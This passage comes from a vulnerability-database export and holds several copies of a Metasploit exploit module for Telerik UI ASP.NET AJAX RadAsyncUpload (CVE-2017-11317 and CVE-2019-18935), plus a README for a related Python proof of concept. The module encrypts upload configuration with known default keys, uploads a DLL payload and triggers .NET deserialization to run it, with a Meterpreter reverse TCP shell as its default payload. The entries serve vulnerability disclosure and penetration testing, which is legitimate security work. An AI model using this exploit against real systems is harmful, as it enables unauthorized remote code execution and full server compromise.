'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if [email\u00a0protected]? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://0day.today/exploit/35085", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-10-20T20:37:38", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? \nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} \nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') \nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-08-19T02:45:13", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/telerik_rau_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || \"#{Rex::Text.rand_text_alphanumeric(rand(4..35))}.dll\"\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return 